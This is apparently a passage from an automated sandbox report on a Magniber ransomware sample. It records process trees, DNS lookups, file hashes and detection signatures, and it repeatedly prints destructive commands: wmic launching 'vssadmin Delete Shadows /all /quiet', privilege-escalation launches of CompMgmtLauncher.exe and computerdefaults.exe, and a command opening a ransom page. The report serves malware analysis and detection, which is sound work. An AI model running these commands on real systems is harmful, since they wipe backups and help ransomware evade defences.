PID 1172 wrote to memory of 344 N/A C:\Windows\system32\Dwm.exe C:\Windows\system32\wbem\wmic.exe
PID 1172 wrote to memory of 344 N/A C:\Windows\system32\Dwm.exe C:\Windows\system32\wbem\wmic.exe
PID 1172 wrote to memory of 1784 N/A C:\Windows\system32\Dwm.exe C:\Windows\system32\cmd.exe
PID 1172 wrote to memory of 1784 N/A C:\Windows\system32\Dwm.exe C:\Windows\system32\cmd.exe
PID 1172 wrote to memory of 1784 N/A C:\Windows\system32\Dwm.exe C:\Windows\system32\cmd.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Windows\system32\taskhost.exe

"taskhost.exe"

C:\Windows\system32\Dwm.exe

"C:\Windows\system32\Dwm.exe"

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\e22903f461b4ba138bf4cfaee0062c9a_JaffaCakes118.dll,#1

C:\Windows\system32\notepad.exe

notepad.exe C:\Users\Public\readme.txt

C:\Windows\system32\cmd.exe

cmd /c "start http://14c430d846009c5066qbvpseec.gosmark.space/qbvpseec^&2^&41210360^&72^&351^&12"

C:\Windows\system32\wbem\wmic.exe

C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" http://14c430d846009c5066qbvpseec.gosmark.space/qbvpseec&2&41210360&72&351&12

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2356 CREDAT:275457 /prefetch:2

C:\Windows\system32\cmd.exe

cmd /c CompMgmtLauncher.exe

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\CompMgmtLauncher.exe

CompMgmtLauncher.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\wbem\wmic.exe

C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\cmd.exe

cmd /c CompMgmtLauncher.exe

C:\Windows\system32\CompMgmtLauncher.exe

CompMgmtLauncher.exe

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\wbem\wmic.exe

C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\cmd.exe

cmd /c CompMgmtLauncher.exe

C:\Windows\system32\CompMgmtLauncher.exe

CompMgmtLauncher.exe

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\wbem\wmic.exe

C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\cmd.exe

cmd /c CompMgmtLauncher.exe

C:\Windows\system32\CompMgmtLauncher.exe

CompMgmtLauncher.exe

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\wbem\wmic.exe

C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\cmd.exe

cmd /c CompMgmtLauncher.exe

C:\Windows\system32\CompMgmtLauncher.exe

CompMgmtLauncher.exe

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

Network

Country Destination Domain Proto
US 8.8.8.8:53 14c430d846009c5066qbvpseec.gosmark.space udp
US 8.8.8.8:53 14c430d846009c5066qbvpseec.gosmark.space udp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp

Files

memory/1116-0-0x0000000000570000-0x0000000000575000-memory.dmp

memory/2116-15-0x00000000025C0000-0x00000000025C1000-memory.dmp

memory/2116-14-0x0000000002480000-0x0000000002481000-memory.dmp

memory/2116-13-0x0000000002460000-0x0000000002461000-memory.dmp

memory/2116-12-0x0000000002450000-0x0000000002451000-memory.dmp

memory/2116-11-0x0000000002410000-0x0000000002411000-memory.dmp

memory/2116-10-0x0000000001D40000-0x0000000001D41000-memory.dmp

memory/2116-9-0x0000000001D30000-0x0000000001D31000-memory.dmp

memory/2116-8-0x0000000001D20000-0x0000000001D21000-memory.dmp

memory/2116-7-0x00000000002B0000-0x00000000002B1000-memory.dmp

memory/2116-6-0x00000000002A0000-0x00000000002A1000-memory.dmp

memory/2116-5-0x0000000000290000-0x0000000000291000-memory.dmp

memory/2116-4-0x0000000001DD0000-0x0000000002402000-memory.dmp

C:\Users\Admin\Pictures\readme.txt

MD5 9d4de1b8ffcb1f89c7352821d0dd53f0
SHA1 98447a1b34b9aac7544613a2184a16188d6db7a2
SHA256 c9374a0c1df5c2f8f16a7a53afc2063692ba548bde07417858b27bf743437674
SHA512 102aaf1f7e4bf31cdba1882467a57cac080a31a0f76725b38d646918070a59d5c3f72105d4648acde8f31e9b7d7d96fb94a8313840a4674aee4b2a2f9662a56c

C:\Users\Admin\AppData\Local\Temp\Cab1D25.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\Tar1E03.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 27ff3f1f0d6a8b38e8173e6d0083b09a
SHA1 6ea8652ce4c41d14dc323d910c67692d5f3d0ab3
SHA256 0003c54b8abed07272ca799d92f1d691ebc0400aecbbece2ec3e1b416d719d54
SHA512 286be4a0bff61c597a3ffaf56444fed19fd08eb3f99a11ba50986e9ea7d1add125111b17b330d1416379e974f34f3d470f1893dc741a275bcbdda6a62ac75d3b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 b50e8bfed9de97372b5af1479bedb8b1
SHA1 4df6c567010c3bdf8c546b6a1460b677e0410b80
SHA256 a17b155c65bc696b55903aa1071cb32ba4294849ac4e9bc01fee3c4719098684
SHA512 fc69c5bf71a1998218471a77a0d95d5be02ec1d0134ab7eec3eada77ec781277da4c77bcd07635f6e8b69a22a0a6baa9e8aaf2600358d71a92e3b31aec53757c

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 1975e4a084cadfc2b4297da65b7de1a0
SHA1 8548d70f9712ea8eefba7af32c014ad3ea078797
SHA256 c03930fc45fb4e118d9196acfe7b26bd6722f81ffb627f710d342e300ed0b3dd
SHA512 e4de896d3a44ca40c24fed8ac4a9f026e7f6dfee4f555e4e5a180b09d59740579c357828492d386bbcec4825b3780dcb95fe7607014bc9f94354c8f06b6a5e84

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 c31cd526472c4363246aea1b6e52cc39
SHA1 61c24acf0b6caa8e5375420f31baccd99b1b0456
SHA256 404e928088f886c79abacdeea0f59b24981b1925e1e0eebe7a70ff442fa1b889
SHA512 82d07f53dea27f9e829656d6cac3cc12d3bdb5b90ef15335612a31660b7c26b1ab390837a577253da92bbff7c9f4c2bff031ca6e2893d8c5118286f47c87777b

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 d35259554142cc895be443deea951a9c
SHA1 6ca96b0389e1791eb8933313888bafd2193371c4
SHA256 2495aa77805f4bdc66bce19af53efeec5be0227e442b68aea37824593ccb8d72
SHA512 5108f96da6972ede55905c5a3351eb9536317eb12af30755ef0aa2bfab6d592947d0a452530bc3de43b87f4de4360302957dbb6a50e16a3cfcbecd93ebb246ec

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 e7d4c16b81da2e777394722ba0f9bbdc
SHA1 2d4c407febfd7fb2b96a6c6e21062b8886b1a379
SHA256 d7271848e914171dd033034a0ad025f4c8e0f82a3ef17e5608a5b831ff209cd1
SHA512 9720419ebd3c7113cd9aa430daade2000f97772e6aa9346ae3feae860b2033caffd3e6740411248680c249519c84135fab5ed40a844d511a1395eb2ef34f41be

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 24b03167315b8f3bee88749581b33a4c
SHA1 a11190b6e4455cedab10cfee88115ad6531d0c57
SHA256 9120fda432beda0fd91b1f1171d7b952fa29ce633b03e95848eb5f90a02a42b3
SHA512 a673c4840388b9b31da41f291ff39be766155e2d080aa6f28aa21dd20f849b739577a5b09cf197a39c0a51c170043892b1a7fef522d48f56e93db8424e4146ce

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 de65a9963300054ecd5ea99d36c89b8f
SHA1 2d81516f5345d9359c476ea5efee3574d1bbb5a7
SHA256 797c426a87fa5ddeb251eaf9fd712df53b43391aa9dae27b426650b254e14f97
SHA512 9d53156421472085e652d4157bd1afb6916fd20354e86b5da1364499366943a46eed114ab8a0ac895b7815b6893a60760b76112b8696f51fcc36a1cadc83ee06

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 c57eb90b39652058aadd15d92b8765bf
SHA1 2ac7cf812f94183c67727d9ac2084c52e7b4ef18
SHA256 a46b6b7430a65de53361ae98455f80ae7320f2ceab38639e6a8e6c883efca600
SHA512 ad456aca2fbc5cf73add6d1227320d4fd96f994defa4023decb21a9ceab3a998824bc617a367a00d9366acfa23377e897f025cd890908f5e13cbe146de99ae15

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 aa0e71944fa86bd96e73c0b91f29aba0
SHA1 a4a398d78e4b65f23ca2beb05ef477d3d556eeb1
SHA256 c8a9e2d40f4a8b138f76f817e11ee82f8fb0f9b4d4c9e8989cdbe788104155be
SHA512 c702010e1955d4c7216934f6f3f104ba46ea3d99c0456ae9849e8355ea95bf7f3ead5077e6653b5bd85c004156cc9c780203c902f2d16b7d8afe80ccb35847b3

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 73f6cd476df3bd650a22b2c0dd650bfd
SHA1 7fd3f424bdcefa362765cccb6d3ad1dd27abc1d9
SHA256 f5e50ab621cc4832a8f21940b3fa8c3c840dcc84b220be82818f442a8685bf7a
SHA512 3ea0e23e0a5926f24a32e3b919f80a76a28258c5daeb132f6e6f630dcb02ef90bda0c00cc10a0c05eb0217d4b6a11a27827d5c8fbb9f1adb0e57ed55875c47ac

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 1904e847e1c37ef4e5c777e146294a96
SHA1 3025c2c7a81d171153283cfe1aa21105b919dc23
SHA256 f50942414a06cc4099e00b1689d09582b52c6af32c48dd24e49d5fca894358e3
SHA512 dcb576da981d0385f86ea7058de588d78aeaf7e8fb88cb5a3b1c2124cb0b80768fcd6200b688a5df77b6374890b84b499b35bed866cd49cd8754855b6224ebf8

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 b84931ccd2c636d209f0f31a45920117
SHA1 c837b1ee932f3ed367769af0269aa644fccc76b7
SHA256 907c13cde7f2b21f89b85a26f9939fad99c65ce3d3621863f825a8ac0c9df625
SHA512 cd81a936a50637ef1a91abc3135c4dcf7bd0f72e3324dd071aa117970de270e8ffe3fa78defdd0ba8449fd3c4b265a209d0c34f25eb35d90ec5a87dbb78c2b58

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 4c27a05ccb6112115f6aad6ee64ef7c0
SHA1 6eab9b1b8b700ac9e2d084c345c67165fe5e1c3a
SHA256 734772e53dbd92951ab1cc444448e9ec28935194a7831b894fd9c04385b7103f
SHA512 be504bac9b8d06c97c1fb80a0a476fe18f3f6824d97906dcc6eb74f938376d46b9c7ff26e88308804d940ee8aca882f2e2f69e14dd94a02bf821ecc953126760

Analysis: behavioral2

Detonation Overview

Submitted

2024-12-11 15:46

Reported

2024-12-12 09:06

Platform

win10v2004-20241007-en

Max time kernel

2s

Max time network

152s

Command Line

sihost.exe

Signatures

Detect magniber ransomware

Description Indicator Process Target
N/A N/A N/A N/A

Magniber Ransomware

ransomware magniber

Magniber family

magniber

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\vssadmin.exe

Deletes shadow copies

ransomware defense_evasion impact execution

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1920 set thread context of 2996 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\sihost.exe
PID 1920 set thread context of 3068 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\svchost.exe
PID 1920 set thread context of 2684 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\taskhostw.exe
PID 1920 set thread context of 3428 N/A C:\Windows\system32\rundll32.exe C:\Windows\Explorer.EXE
PID 1920 set thread context of 3556 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\svchost.exe
PID 1920 set thread context of 3768 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\DllHost.exe
PID 1920 set thread context of 3860 N/A C:\Windows\system32\rundll32.exe C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
PID 1920 set thread context of 3924 N/A C:\Windows\system32\rundll32.exe C:\Windows\System32\RuntimeBroker.exe
PID 1920 set thread context of 4024 N/A C:\Windows\system32\rundll32.exe C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
PID 1920 set thread context of 4196 N/A C:\Windows\system32\rundll32.exe C:\Windows\System32\RuntimeBroker.exe
PID 1920 set thread context of 4152 N/A C:\Windows\system32\rundll32.exe C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe
PID 1920 set thread context of 3968 N/A C:\Windows\system32\rundll32.exe C:\Windows\System32\RuntimeBroker.exe
PID 1920 set thread context of 232 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\backgroundTaskHost.exe

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\System32\notepad.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A

Processes

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc

C:\Windows\system32\taskhostw.exe

taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe

"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe" -ServerName:InputApp.AppX9jnwykgrccxc8by3hsrsh07r423xzvav.mca

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\backgroundTaskHost.exe

"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\e22903f461b4ba138bf4cfaee0062c9a_JaffaCakes118.dll,#1

C:\Windows\system32\wbem\wmic.exe

C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\System32\notepad.exe

notepad.exe C:\Users\Public\readme.txt

C:\Windows\System32\cmd.exe

cmd /c "start http://629824a0e2742e5066qbvpseec.gosmark.space/qbvpseec^&2^&44436918^&80^&327^&2219041"

C:\Windows\system32\wbem\wmic.exe

C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\System32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\System32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /all /quiet

C:\Windows\system32\wbem\WMIC.exe

C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\cmd.exe

cmd /c computerdefaults.exe

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://629824a0e2742e5066qbvpseec.gosmark.space/qbvpseec&2&44436918&80&327&2219041

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7fff4aae46f8,0x7fff4aae4708,0x7fff4aae4718

C:\Windows\system32\ComputerDefaults.exe

computerdefaults.exe

C:\Windows\system32\wbem\wmic.exe

C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\System32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\System32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\wbem\wmic.exe

"C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\wbem\wmic.exe

C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"

C:\Windows\system32\cmd.exe

cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""

C:\Windows\system32\cmd.exe

